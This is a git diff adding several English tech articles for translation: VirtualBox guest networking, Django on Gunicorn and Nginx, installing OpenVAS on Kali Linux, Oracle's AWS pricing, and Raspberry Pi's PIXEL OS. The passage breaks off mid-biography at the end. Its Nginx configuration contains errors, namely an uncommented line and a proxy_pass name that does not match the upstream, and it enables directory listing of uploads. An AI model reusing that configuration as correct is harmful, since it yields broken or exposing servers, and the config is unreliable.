b/sources/tech/20170204 How to Configure Network Between Guest VM and Host in Oracle VirtualBox.md @@ -0,0 +1,252 @@ +How to Configure Network Between Guest VM and Host in Oracle VirtualBox +============================================================ + +Once you have installed different operating systems in [Oracle VirtualBox][2], you may want to enable communication between the host and the virtual machines. + +In this article, we will describe the simplest and direct method of setting up a network for guest virtual machines and the host in Linux. + +For the purpose of this tutorial: + +1. Host Operating System – Linux Mint 18 +2. Virtual Machine OS – CentOS 7 and Ubuntu 16.10 + +#### Requirements + +1. A working [Oracle Virtualbox installed][1] on Host machine. +2. You must have installed a guest operating system such as Ubuntu, Fedora, CentOS, Linux Mint or any of your choice in the Oracle virtual box. +3. Power off the virtual machines as you perform the configurations up to the step where your required to turn them on. + +In order for the guest and host machines to communicate, they need to be on the same network and by default, you can attach up to four network cards to your guest machines. + +The default network card (Adapter 1) is normally used to connect the guest machines to the Internet using NATvia the host machine. + +Important: Always set the first adapter to communicate with the host and the second adapter to connect to the Internet. + +### Create a Network For Guests and Host Machine + +At the Virtualbox manager interface below, start by creating a network on which the host and guests will operate. + +Go to File –> Preferences or hit `Ctrl + G`: + +[ + ![Virtualbox Preferences Window](http://www.tecmint.com/wp-content/uploads/2017/02/Virtualbox-Preferences-Window.png) +][3] + +Virtualbox Preferences Window + +From the following interface, there are two options; choose Host-only Networks by clicking on it. Then use the `+`sign on the right to add a new host-only network. + +[ + ![Set Guest Network](http://www.tecmint.com/wp-content/uploads/2017/02/Set-Guest-Network.png) +][4] + +Set Guest Network + +Below is a screen shot showing a new host-only network has been created called vboxnet0. + +[ + ![Virtualbox Preferences Window](http://www.tecmint.com/wp-content/uploads/2017/02/Virtualbox-Preferences-Window-1.png) +][5] + +Virtualbox Preferences Window + +If you want, you can remove it by using the `-` button in the middle and to view the network details/settings, click on the edit button. + +You can as well change the values as per your preferences, such as the network address, network mask, etc. + +Note: The IPv4 address in the interface below is the IP address of your host machine. + +[ + ![Host Network Details](http://www.tecmint.com/wp-content/uploads/2017/02/Host-Network-Details.png) +][6] + +Host Network Details + +In the next interface, you can configure the DHCP server that is if you want the guest machines to use a dynamic IP address (make sure it is enabled before using it). But I recommend using a static IP address for the virtual machines. + +Now click OK on all network settings interfaces below to save the changes. + +[ + ![Set Guest Static IP aAddress](http://www.tecmint.com/wp-content/uploads/2017/02/Set-Guest-Static-IP-Address.png) +][7] + +Set Guest Static IP aAddress + +#### Configure Virtual Machine Network Settings + +Note: You can follow the steps below for every virtual machine that you want to add on the network to communicate with the host machine. + +Back at the virtual box manager interface, select your guest virtual machine such as Ubuntu 16.10 server or CentOS 7 and click on the Settings menu. + +[ + ![Configure VM Settings](http://www.tecmint.com/wp-content/uploads/2017/02/Configure-VM-Settings.png) +][8] + +Configure VM Settings + +#### Configure Adapter to Connect Virtual Machine to Host + +Choose the Network option from the interface above. Afterwards, configure first network card (Adapter 1) with the following settings: + +1. Check the option: “Enable Network Adapter” to turn it on. +2. In the field Attached to: select Host-only Adapter +3. Then select the Name of the network: vboxnet0 + +As in the screen shot below and click OK to save the settings: + +[ + ![Enable Network Adapter for Guest VM](http://www.tecmint.com/wp-content/uploads/2017/02/Enable-Network-Adapter-for-Guest-VM.png) +][9] + +Enable Network Adapter for Guest VM + +#### Configure Adapter to Connect Virtual Machine to Internet + +Then add a second network card (Adapter 2) to connect virtual machine to the Internet via the host. Use the settings below: + +1. Check the option: “Enable Network Adapter” to activate it. +2. In the field Attached to: select NAT + +[ + ![Enable Network Adapter for VM](http://www.tecmint.com/wp-content/uploads/2017/02/Enable-Network-Adapter-for-VM.png) +][10] + +Enable Network Adapter for VM + +#### Setup Static IP Address for Guest Virtual Machine + +At this stage, power on the guest virtual machine, login and [configure static IP address][11]. Run the command below to show all the interfaces on the guest machine and allocated IP addresses: + +``` +$ ip add +``` +[ + ![Configure Static IP Address for VM](http://www.tecmint.com/wp-content/uploads/2017/02/Configure-Static-IP-Address-for-VM.png) +][12] + +Configure Static IP Address for VM + +From the screen shot above, you can see that there are three interfaces enabled on the virtual machine: + +1. `lo` – loopback interface +2. `enp0s3` (Adapter 1) – for host-only communication which is using the DHCP as set in one of the previous steps and later configured with a static IP address. +3. `enp0s8` (Adapter 2) – for connection to the Internet. It will use DHCP by default. + +##### On Debian/Ubuntu/Linux Mint + +Important: Here, I used Ubuntu 16.10 Server: IP address: 192.168.56.5. + +Open the file /etc/network/interfaces using your favorite editor with super user privileges: + +``` +$ sudo vi /etc/network/interfaces +``` + +Use the following settings for the interface enp0s3 (use your preferred values here): + +``` +auto enp0s3 +iface enp0s3 inet static +address 192.168.56.5 +network 192.168.56.0 +netmask 255.255.255.0 +gateway 192.168.56.1 +dns-nameservers 8.8.8.8 192.168.56.1 +``` + +Save the file and exit. + +Then restart network services like so: + +``` +$ sudo systemctl restart networking +``` + +Alternatively, reboot the system and closely, check if the interface is using the new ip addresses: + +``` +$ ip add +``` + +##### On RHEL/CentOS/Fedora + +Important: For this section, I used CentOS 7: IP address: 192.168.56.10. + +Begin by opening the file for enp0s3 – host-only network interface; /etc/sysconfig/network-scripts/ifcfg-enp0s3using your favorite editor with super user privileges: + +``` +$ sudo vi /etc/sysconfig/network-scripts/ifcfg-enp0s3 +``` + +Create/modify the following settings (use your preferred values here): + +``` +BOOTPROTO=static +ONBOOT=yes +IPADDR=192.168.56.10 +NETWORK=192.168.56.0 +NETMASK=255.255.255.0 +GATEWAY=192.168.56.1 +DNS=8.8.8.8 192.168.56.1 +NM_CONTROLLED=no #use this file not network manager to manage interface +``` + +Save the file and exit. Then restart network service as follows (you can as well reboot): + +``` +$ sudo systemctl restart network.service +``` + +Check if the interface is using the new IP addresses as follows: + +``` +$ ip add +``` + +#### Manage Virtual Machines From Host Using SSH + +On the host machine, use SSH to manage your virtual machines. In the following example, am accessing the CentOS 7 (192.168.56.10)server using SSH: + +``` +$ ssh tecmint@192.168.56.10 +$ who +``` +[ + ![Connect Guest VM using SSH](http://www.tecmint.com/wp-content/uploads/2017/02/Connect-Guest-VM-using-SSH.png) +][13] + +Connect Guest VM using SSH + +That’s it! In this post, we described a straightforward method of setting up a network between a guest virtual machines and the host. Do share your thoughts about this tutorial using the feedback section below. + +-------------------------------------------------------------------------------- + +译者简介: + +Aaron Kili is a Linux and F.O.S.S enthusiast, an upcoming Linux SysAdmin, web developer, and currently a content creator for TecMint who loves working with computers and strongly believes in sharing knowledge. + +-------------------------------------------------------------------------------- + +via: http://www.tecmint.com/network-between-guest-vm-and-host-virtualbox/ + +作者:[Aaron Kili][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.tecmint.com/author/aaronkili/ + +[1]:http://www.tecmint.com/install-virtualbox-on-redhat-centos-fedora/ +[2]:http://www.tecmint.com/install-virtualbox-on-redhat-centos-fedora/ +[3]:http://www.tecmint.com/wp-content/uploads/2017/02/Virtualbox-Preferences-Window.png +[4]:http://www.tecmint.com/wp-content/uploads/2017/02/Set-Guest-Network.png +[5]:http://www.tecmint.com/wp-content/uploads/2017/02/Virtualbox-Preferences-Window-1.png +[6]:http://www.tecmint.com/wp-content/uploads/2017/02/Host-Network-Details.png +[7]:http://www.tecmint.com/wp-content/uploads/2017/02/Set-Guest-Static-IP-Address.png +[8]:http://www.tecmint.com/wp-content/uploads/2017/02/Configure-VM-Settings.png +[9]:http://www.tecmint.com/wp-content/uploads/2017/02/Enable-Network-Adapter-for-Guest-VM.png +[10]:http://www.tecmint.com/wp-content/uploads/2017/02/Enable-Network-Adapter-for-VM.png +[11]:http://www.tecmint.com/set-add-static-ip-address-in-linux/ +[12]:http://www.tecmint.com/wp-content/uploads/2017/02/Configure-Static-IP-Address-for-VM.png +[13]:http://www.tecmint.com/wp-content/uploads/2017/02/Connect-Guest-VM-using-SSH.png diff --git a/sources/tech/20170205 Hosting Django With Nginx and Gunicorn on Linux.md b/sources/tech/20170205 Hosting Django With Nginx and Gunicorn on Linux.md new file mode 100644 index 0000000000..95203f013e --- /dev/null +++ b/sources/tech/20170205 Hosting Django With Nginx and Gunicorn on Linux.md @@ -0,0 +1,173 @@ +### Hosting Django With Nginx and Gunicorn on Linux + +![](https://linuxconfig.org/images/gunicorn_logo.png?58963dfd) + +Contents + +* * [1. Introduction][4] + * [2. Gunicorn][5] + * [2.1. Installation][1] + * [2.2. Configuration][2] + * [2.3. Running][3] + * [3. Nginx][6] + * [4. Closing Thoughts][7] + +### Introduction + +Hosting Django web applications is fairly simple, though it can get more complex than a standard PHP application. There are a few ways to handle making Django interface with a web server. Gunicorn is easily one of the simplest.  + +Gunicorn(short for Green Unicorn) acts as in intermediary server between your web server, Nginx in this case, and Django itself. It handles serving the application itself while Nginx picks up the static content. + +### Gunicorn + +### Installation + +Installing Gunicorn is super easy with Pip. If you've already set up your Django project using virtualenv, you have Pip and should be familiar with the way it works. So, install Gunicorn in your virtualenv. +``` +$ pip install gunicorn +``` + +### Configuration + +One of the things that makes Gunicorn an appealing choice is the simplicity of its configuration. The best way to handle the configuration is to create a `Gunicorn` folder in the root directory of your Django project. Inside that folder, create a configuration file.  + +For this guide, it'll be called `gunicorn-conf.py`. In that file, create something similar to the configuration below. +``` +import multiprocessing + +bind = 'unix:///tmp/gunicorn1.sock' +workers = multiprocessing.cpu_count() * 2 + 1 +reload = True +daemon = True +``` +In the case of the above configuration, Gunicorn will create a Unix socket at `/tmp/gunicorn1.sock`. It will also spin up a number of worker processes equivalent to the double the number of CPU cores plus one. It will also automatically reload and run as a daemonized process. + +### Running + +The command to run Gunicorn is a bit long, but it has additional configuration options specified in it. The most important part is to point Gunicorn to your project's `.wsgi` file. +``` +gunicorn -c gunicorn/gunicorn-conf.py -D --error-logfile gunicorn/error.log yourproject.wsgi +``` +The command above should be run from your project's root. It tells Gunicorn to use the configuration that you created with the `-c` flag. `-D` once again specifies that it should be daemonized. The last part specifies the location of Gunicorn's error long in the `Gunicorn` folder that you created. The command ends by telling Gunicorn the location of your `.wsgi`file. + +### Nginx + +Now that Gunicorn is configured and running, you can set up Nginx to connect with it and serve your static files. This guide is going to assume that you have Nginx already configured and that you are using separate `server` blocks for the sites hosted through it. It is also going to include some SSL info.  + +If you want to learn how to get free SSL certificates for your site, take a look at our [LetsEncrypt Guide][8]. +``` +# Set up the connection to Gunicorn +upstream yourproject-gunicorn { + server unix:/tmp/gunicorn1.sock fail_timeout=0; +} + +# Redirect unencrypted traffic to the encrypted site +server { + listen 80; + server_name yourwebsite.com; + return 301 https://yourwebsite.com$request_uri; +} + +# The main server block +server { + # Set the port to listen on and specify the domain to listen for + listen 443 default ssl; + client_max_body_size 4G; + server_name yourwebsite.com; + + # Specify log locations + access_log /var/log/nginx/yourwebsite.access_log main; + error_log /var/log/nginx/yourwebsite.error_log info; + + # Point Nginx to your SSL certs + ssl on; + ssl_certificate /etc/letsencrypt/live/yourwebsite.com/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/yourwebsite.com/privkey.pem; + + # Set your root directory + root /var/www/yourvirtualenv/yourproject; + + # Point Nginx at your static files + location /static/ { + # Autoindex the files to make them browsable if you want + autoindex on; + # The location of your files + alias /var/www/yourvirtualenv/yourproject/static/; + # Set up caching for your static files + expires 1M; + access_log off; + add_header Cache-Control "public"; + proxy_ignore_headers "Set-Cookie"; + } + + # Point Nginx at your uploaded files + location /media/ { + Autoindex if you want + autoindex on; + # The location of your uploaded files + alias /var/www/yourvirtualenv/yourproject/media/; + # Set up aching for your uploaded files + expires 1M; + access_log off; + add_header Cache-Control "public"; + proxy_ignore_headers "Set-Cookie"; + } + + location / { + # Try your static files first, then redirect to Gunicorn + try_files $uri @proxy_to_app; + } + + # Pass off requests to Gunicorn + location @proxy_to_app { + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header Host $http_host; + proxy_redirect off; + proxy_pass http://njc-gunicorn; + } + + # Caching for HTML, XML, and JSON + location ~* \.(html?|xml|json)$ { + expires 1h; + } + + # Caching for all other static assets + location ~* \.(jpg|jpeg|png|gif|ico|css|js|ttf|woff2)$ { + expires 1M; + access_log off; + add_header Cache-Control "public"; + proxy_ignore_headers "Set-Cookie"; + } +} +``` +Okay, so that's a bit much, and there can be a lot more. The important points to note are the `upstream` block that points to Gunicorn and the `location` blocks that pass traffic to Gunicorn. Most of the rest is fairly optional, but you should do it in some form. The comments in the configuration should help you with the specifics.  + +Once that file is saved, you can restart Nginx for the changes to take effect. +``` +# systemctl restart nginx +``` +Once Nginx comes back online, your site should be accessible via your domain. + +### Closing Thoughts + +There is much more that can be done with Nginx, if you want to dig deep. The configurations provided, though, are a good starting point and are something you can actually use. If you're used to Apache and bloated PHP applications, the speed of a server configuration like this should come as a pleasant surprise. + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux + +作者:[Nick Congleton][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux +[1]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h2-1-installation +[2]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h2-2-configuration +[3]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h2-3-running +[4]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h1-introduction +[5]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h2-gunicorn +[6]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h3-nginx +[7]:https://linuxconfig.org/hosting-django-with-nginx-and-gunicorn-on-linux#h4-closing-thoughts +[8]:https://linuxconfig.org/generate-ssl-certificates-with-letsencrypt-debian-linux diff --git a/sources/tech/20170206 OpenVAS - Vulnerability Assessment install on Kali Linux.md b/sources/tech/20170206 OpenVAS - Vulnerability Assessment install on Kali Linux.md new file mode 100644 index 0000000000..a43ad62398 --- /dev/null +++ b/sources/tech/20170206 OpenVAS - Vulnerability Assessment install on Kali Linux.md @@ -0,0 +1,136 @@ +OpenVAS - Vulnerability Assessment install on Kali Linux +============================================================ + +### On this page + +1. [What is Kali Linux?][1] +2. [Updating Kali Linux][2] +3. [Installing OpenVAS 8][3] +4. [Start OpenVAS on Kali][4] + +This tutorial documents the process of installing OpenVAS 8.0 on Kali Linux rolling. OpenVAS is open source [vulnerability assessment][6] application that automates the process of performing network security audits and vulnerability assessments. Note, a vulnerability assessment also known as VA is not a penetration test, a penetration test goes a step further and validates the existence of a discovered vulnerability, see [what is penetration testing][7] for an overview of what pen testing consists of and the different types of security testing. + +### What is Kali Linux? + +Kali Linux is a Linux penetration testing distribution. It's Debian based and comes pre-installed with many commonly used penetration testing tools such as Metasploit Framework and other command line tools typically used by penetration testers during a security assessment. + +For most use cases Kali runs in a VM, you can grab the latest VMWare or Vbox image of Kali from here: [https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/][8] + +Download the full version not Kali light, unless you have a specific reason for wanting a smaller virtual machine footprint. After the download finishes you will need to extract the contents and open the vbox or VMWare .vmx file, when the machine boots the default credentials are root / toor. Change the root password to a secure password. + +Alternatively, you can download the ISO version and perform an installation of Kali on the bare metal. + +### Updating Kali Linux + +After installation, perform a full update of Kali Linux. + +Updating Kali: + +apt-get update && apt-get dist-upgrade -y + +[ + ![Updating Kali Linux](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/kali-apt-get-update-dist-upgrade.png) +][9] + +The update process might take some time to complete. Kali is now a rolling release meaning you can update to the current version from any version of Kali rolling. However, there are release numbers but these are point in time versions of Kali rolling for VMWare snapshots. You can update to the current stable release from any of the VMWare images. + +After updating perform a reboot. + +### Installing OpenVAS 8 + +[ + ![Installing OpenVAS 8](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/kali-install-openvas-vulnerability-assessment.png) +][10] + +apt-get install openvas + +openvas-setup + +During installation you'll be prompted about redis, select the default option to run as a UNIX socket. + +[ + ![Configure OpenVAS Scanner](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-vulnerability-scanner-enable-redis.png) +][11] + +Even on a fast connection openvas-setup takes a long time to download and update all the required CVE, SCAP definitions. + +[ + ![Update all the required CVE, SCAP definitions](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-vulnerability-scanner-install-2.png) +][12] + +Pay attention to the command output during openvas-setup, the password is generated during installation and printed to console near the end of the setup. + +[ + ![Command output during install](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-vulnerability-scanner-install-complete.png) +][13] + +Verify openvas is running: + +netstat -tulpn + +[ + ![Check OpenVAS Status](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-running-netstat.png) +][14] + +### Start OpenVAS on Kali + +To start the OpenVAS service on Kali run: + +openvas-start + +After installation, you should be able to access the OpenVAS web application at **https://127.0.0.1:9392** + +**[ + ![OpenVAS started](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-self-signed-certificate.png) +][5]** + +Accept the self-signed certificate and login to the application using the credentials admin and the password displayed during openvas-setup. + +[ + ![Accept the self-signed SSL cert](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/accept-openvas-self-signed-certificate.png) +][15] + +After accepting the self-signed certificate, you should be presented with the login screen: + +[ + ![OpenVAS Login](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-login-screen.png) +][16] + +After logging in you should be presented with the following screen: + +[ + ![OpenVAS Dashboard](https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/openvas-menu.png) +][17] + +From this point you should be able to configure your own vulnerability scans using the wizard. + +It's recommended to read the documentation. Be aware of what a vulnerability assessment conductions (depending on configuration OpenVAS could attempt exploitation) and the traffic it will generate on a network as well as the DOS effect it can have on services / servers and hosts / devices on a network. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/ + +作者:[KJS ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/ +[1]:https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/#what-is-kali-linux +[2]:https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/#updating-kali-linux +[3]:https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/#installing-openvas- +[4]:https://www.howtoforge.com/tutorial/openvas-vulnerability-assessment-install-on-kali-linux/#start-openvas-on-kali +[5]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-self-signed-certificate.png +[6]:https://www.aptive.co.uk/vulnerability-assessment/ +[7]:https://www.aptive.co.uk/penetration-testing/ +[8]:https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/ +[9]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/kali-apt-get-update-dist-upgrade.png +[10]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/kali-install-openvas-vulnerability-assessment.png +[11]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-vulnerability-scanner-enable-redis.png +[12]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-vulnerability-scanner-install-2.png +[13]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-vulnerability-scanner-install-complete.png +[14]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-running-netstat.png +[15]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/accept-openvas-self-signed-certificate.png +[16]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-login-screen.png +[17]:https://www.howtoforge.com/images/openvas_vulnerability_assessment_install_on_kali_linux/big/openvas-menu.png diff --git a/sources/tech/20170206 Oracle Policy Change Raises Prices on AWS.md b/sources/tech/20170206 Oracle Policy Change Raises Prices on AWS.md new file mode 100644 index 0000000000..53de41aac2 --- /dev/null +++ b/sources/tech/20170206 Oracle Policy Change Raises Prices on AWS.md @@ -0,0 +1,49 @@ +Oracle Policy Change Raises Prices on AWS +============================================================ + +>The change, which effectively doubles Oracle's prices for implementing its software on AWS, was put in effect quietly, with little notification to users. + + ![](http://windowsitpro.com/site-files/windowsitpro.com/files/imagecache/large_img/uploads/2017/02/ellison-hero.jpg) + +News came last week that Oracle has, in effect, doubled the price for running its products on Amazon's cloud. It has done so with a bit of sleight-of-hand on [how it counts AWS's virtual CPUs.][6] It also did so without fanfare. The company's new pricing policy went in effect on January 23, and pretty much went unnoticed until January 28, when Oracle follower Tim Hall stumbled on the change in Big Red's ["Licensing Oracle Software in the Cloud Computing Environment"][7] document and blew the whistle. + +At first glance, this move might not seem to mean much, as it only puts Oracle's AWS pricing on par with its prices on Microsoft Azure. But Azure is only about a third the size of market leading AWS, so if you want to make money selling licenses in the cloud, AWS is the place to be. And while this move may or may not affect those already using Oracle on AWS -- it's not clear whether the new rules apply to those already using the products -- it will certainly push some new users who might otherwise consider Oracle to look elsewhere. + +The main reason for this move is obvious. Oracle is hoping to make its own cloud more attractive -- which led [The Register to observe][8] with a bit of snark, "Larry Ellison did promise Oracle's cloud would be faster and cheaper." Faster and cheaper both remain to be seen. Faster maybe, if Oracle's SPARC cloud launches as planned and if it performs as advertised. Cheaper might be less likely. Oracle is known for playing hardball with its prices. + +With declining sales of its signature database and business stack, and with its $7.4 billion dollar bet on Sun not working out as planned, Oracle is betting its future on the cloud. But Oracle came late to the party and its efforts so far seem to be returning lackluster results, with some financial forecasters not seeing a bright future for Oracle Cloud. The cloud is a crowded market, they say, and the big four -- Amazon, Microsoft, IBM and Google -- already have a commanding lead. + +That's true. But the biggest obstacle Oracle faces in the cloud is...well, Oracle. Its reputation precedes it. + +It's an understatement to say the company is not known for stellar customer service. Indeed, press reports paint Oracle as something of a bully and a manipulator. + +Back in 2015, for example, Oracle, evidently growing frustrated because its cloud wasn't growing as fast as anticipated, began [activating what Business Insider called the "nuclear option."][9] It would audit a client's datacenter and if the client wasn't in compliance, it would issue a "breach notice" -- usually reserved only for cases of large scale abuse -- and order the client to quit using its software within 30 days. + +In case you don't know, big corporations heavily invested in Oracle's stack absolutely couldn't migrate to another solution on such short notice. An Oracle breach notice spelled disaster. + +"[T]o make the breach notice go away — or to reduce an outrageously high out-of-compliance fine — an Oracle sales rep often wants the customer to add cloud "credits" to the contract...," Business Insider's Julie Bort explained. + +In other words, Oracle was using the audit to arm-twist clients to buy into its cloud, whether or not they had a need. There might also be a tie-in between this tactic and the recent price doubling on AWS. A commenter to Hall's article noted that the purpose behind the secrecy surrounding the price boost could possibly be to trigger software audits. + +The trouble with employing tactics like these is that sooner or later they catch up with you. Word gets out. Your customers start looking for other options. It might be time for Big Red to take a page from Microsoft's playbook and start working to build a kinder and gentler Oracle that puts the needs of its customers first. + +-------------------------------------------------------------------------------- + +via: http://windowsitpro.com/cloud/oracle-policy-change-raises-prices-aws + +作者:[Christine Hall][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://windowsitpro.com/author/christine-hall +[1]:http://windowsitpro.com/penton_ur/nojs/user/register?path=node%2F186491&nid=186491&source=email +[2]:http://windowsitpro.com/author/christine-hall +[3]:http://windowsitpro.com/author/christine-hall +[4]:http://windowsitpro.com/cloud/oracle-policy-change-raises-prices-aws#comments +[5]:http://windowsitpro.com/cloud/oracle-policy-change-raises-prices-aws#comments +[6]:https://oracle-base.com/blog/2017/01/28/oracles-cloud-licensing-change-be-warned/ +[7]:http://www.oracle.com/us/corporate/pricing/cloud-licensing-070579.pdf +[8]:https://www.theregister.co.uk/2017/01/30/oracle_effectively_doubles_licence_fees_to_run_in_aws/ +[9]:http://www.businessinsider.com/oracle-is-using-the-nuclear-option-to-sell-its-cloud-software-2015-7 diff --git a/sources/tech/20170206 Try Raspberry Pis PIXEL OS on your PC.md b/sources/tech/20170206 Try Raspberry Pis PIXEL OS on your PC.md new file mode 100644 index 0000000000..5f3cc73b2b --- /dev/null +++ b/sources/tech/20170206 Try Raspberry Pis PIXEL OS on your PC.md @@ -0,0 +1,145 @@ +Try Raspberry Pi's PIXEL OS on your PC +============================================================ + + + ![Try Raspberry Pi's PIXEL OS on your PC](https://opensource.com/sites/default/files/styles/image-full-size/public/images/life/virtualbox_pixel_raspberrypi.jpg?itok=bEdS8qpi "Try Raspberry Pi's PIXEL OS on your PC") +Image credits :  + +Raspberry Pi Foundation, CC BY-SA + +Over the last four years, the Raspberry Pi Foundation has put a great deal of effort into optimizing Raspbian, its port of Debian, for Pi hardware, including creating new educational software, programming tools, and a nicer looking desktop. + +In September, we released an update that introduced PIXEL (Pi Improved Xwindows Environment, Lightweight), the Pi's new desktop environment. Just before Christmas, we released a version of the OS that runs on x86 PCs, so now you can install it on your PC, Mac, or laptop. + + ![Installing PIXEL](https://opensource.com/sites/default/files/pixel_0.jpg "Installing PIXEL") + +Of course, like many well-supported Linux distros, the OS runs really well on old hardware. Raspbian is a great way to breathe new life into that old Windows machine that you gave up on years ago. + +The [PIXEL ISO][13] is available for download from the Raspberry Pi website, and a bootable live DVD was given away on the front of "[The MagPi][14]" magazine. + + ![Welcome to PIXEL](https://opensource.com/sites/default/files/welcome-to-pixel.jpg "Welcome to PIXEL") + +We released Raspberry Pi's OS for PCs to remove the barrier to entry for people looking to learn computing.This release is even cheaper than buying a Raspberry Pi because it is free and you can use it on your existing computer. PIXEL is the Linux desktop we've always wanted, and we want it to be available to everyone. + +### Powered by Debian + +Raspbian, or the x86 PIXEL distro, wouldn't be possible without its construction on top of Debian. Debian has a huge bank of amazing free and open source software, programs, games, and other tools from an apt repository. On the Raspberry Pi, you're limited to packages that are compiled to run on [ARM][15] chips. However, on the PC image, you have a much wider scope for which packages will run on your machine, because Intel chips found in PCs have much greater support. + + ![Debian Advanced Packaging Tool (APT) repository](https://opensource.com/sites/default/files/apt.png "Debian Advanced Packaging Tool (APT) repository") + +### What PIXEL contains + +Both Raspbian with PIXEL and Debian with PIXEL come bundled with a whole host of software. Raspbian comes with: + +* Programming environments for Python, Java, Scratch, Sonic Pi, Mathematica*, Node-RED, and the Sense HAT emulator +* The LibreOffice office suite +* Chromium (including Flash) and Epiphany web browsers +* Minecraft: Pi edition (including a Python API)* +* Various tools and utilities + +*The only programs from this list not included in the x86 version are Mathematica and Minecraft, due to licensing limitations. + + ![PIXEL menu](https://opensource.com/sites/default/files/pixel-menu.png "PIXEL menu") + +### Create a PIXEL live disk + +You can download the PIXEL ISO and write it to a blank DVD or a USB stick. Then you can boot your PC from the disk, and you'll see the PIXEL desktop in no time. You can browse the web, open a programming environment, or use the office suite, all without installing anything on your computer. When you're done, just take out the DVD or USB drive, shut down your computer, and when you power up your computer again, it'll boot back up into your usual OS as before. + +### Run PIXEL in a virtual machine + +One way of trying out PIXEL is to install it in a virtual machine using a tool like VirtualBox. + + ![PIXEL Virtualbox](https://opensource.com/sites/default/files/pixel-virtualbox.png "PIXEL Virtualbox") + +This allows you to try out the image without installing it, or you can just run it in a window alongside your main OS, and get access to the software and tools in PIXEL. It also means your session will persist, rather than starting from scratch every time you reboot, as you would with a live disk. + +### Install PIXEL on your PC + +If you're really ready to commit, you can wipe your old operating system and install PIXEL on your hard drive. This might be a good idea if you're wanting to make use of an old unused laptop. + +### PIXEL in education + +Many schools use Windows on all their PCs, and have strict controls over what software can be installed on them. This makes it difficult for teachers to use the software tools and IDE (integrated development environment) necessary to teach programming skills. Even online-based programming initiatives like Scratch 2 can be blocked by overcautious network filters. In some cases, installing something like Python is simply not possible. The Raspberry Pi hardware addresses this by providing a small, cheap computer that boots from an SD card packed with educational software, which students can connect up to the monitor, mouse, and keyboard of an existing PC. + +However, a PIXEL live disc allows teachers to boot into a system loaded with ready-to-use programming languages and tools, all of which do not require installation permissions. At the end of the lesson, they can shut down safely, bringing the computers back to their original state. This is also a handy solution for Code Clubs, CoderDojos, youth clubs, Raspberry Jams, and more. + +### Remote GPIO + +One of the features that sets the Raspberry Pi apart from traditional desktop PCs is the presence of GPIO pins (General Purpose Input/Output) pins, which allow you to connect electronic components and add-on boards to devices in the real world, opening up new worlds, such as hobby projects, home automation, connected devices, and the Internet of Things. + +One wonderful feature of the [GPIO Zero][16] Python library is the ability to control the GPIO pins of a Raspberry Pi over the network with some simple code written on your PC. + + + +Remote GPIO is possible from one Raspberry Pi to another or from any PC running any OS, but, of course, with PIXEL x86 you have everything you need pre-installed and it works out of the box. See Josh's [blog post][17] and refer to my [gist][18] for more information. + +### Further guidance + +[Issue #53 of The MagPi][19] features some great guides for trying out and installing PIXEL, including using the live disc with a persistence drive to maintain your files and applications. You can buy a copy, or download the PDF for free. Check it out to read more. + +-------------------------------------------------------------------------------- + +译者简介: + +Ben Nuttall - Ben Nuttall is the Raspberry Pi Community Manager. In addition to his work for the Raspberry Pi Foundation, he's into 